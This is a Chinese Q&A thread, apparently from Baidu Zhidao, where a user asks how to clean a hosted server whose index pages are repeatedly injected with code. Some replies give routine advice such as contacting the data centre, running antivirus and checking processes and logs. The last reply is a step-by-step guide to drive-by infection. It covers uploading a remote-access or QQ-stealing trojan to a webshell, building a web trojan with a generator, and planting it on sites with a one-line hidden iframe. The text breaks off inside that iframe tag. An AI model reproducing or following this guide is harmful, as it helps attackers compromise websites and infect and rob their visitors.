服务器中木马了!!(懂服务器的请进)

来源:百度知道 编辑:UC知道 时间:2024/06/15 00:51:37
最近公司的服务器中木马了,每个文件夹里类似于index.asp,index.html,default.asp,index.htm等的一些文件都被加了加代码,有一定的周期性,删一次是一次,很郁闷,请问哪位高人能“治”好这种“病”,小弟先谢了。(服务器是托管的,本人用系统自带的“远程桌面链接工具”)

让机房 给你处理

用卡巴斯基

下个瑞星卡卡,恶意软件清理助手,上网助手
有些东西杀毒软件也检测不出,多用一下第三方软件!
我机子也经常出毛病,不错的!

还是先研究一下系统进程,看看可疑断口,读读日志文件.然后杀杀毒,以便判断到底是中木马还是中病毒了吧.

在这之前先准备几样东西,必备的:
一、webshell一个,或者自己的网页空间。
二、木马。什么木马都可以(黑洞,灰鸽子,QQ大盗随便什么木马都可以)
三、网页木马生成器。

step1:
在本地先配置好木马,比如生成黑洞,灰鸽子,QQ大盗等等,然后把这个木马上传到网站的空间,或者自己得到的webshell上。
在这里要注意一点:
在上传到webshell上的时候,最简单的就是上传到网页的根目录下,这样刚才上传的木马的路径比较好找一点,比如网站问www.xxx.com 上传到网页根目录下的木马地址就是www.xxx.com/刚才生成的木马的名字.exe

step2:

找到一个网页木马生成起,网上有很多的自己可以到网上找一下。(建议出学者不要用火狐网页木马生成器,因为那个配置对于出学者来说有点不方便。呵呵~)
然后用木马生成器把刚才的那个在本地生成的木马,在本地生成为网页木马。
这里要注意的一点是:网站的路径要填正确,就是刚才那个木马的网站路径。
然后就会在本地生成几个文件,然后就把这几个文件再上传到刚才的网站路径下,这样记下刚才那个 html的文件路径,这样一个网页木马就搞定了。

step 3:

现在就可以使用一句话代码在网站上挂马了。

代码为:<iframe src="马的地址"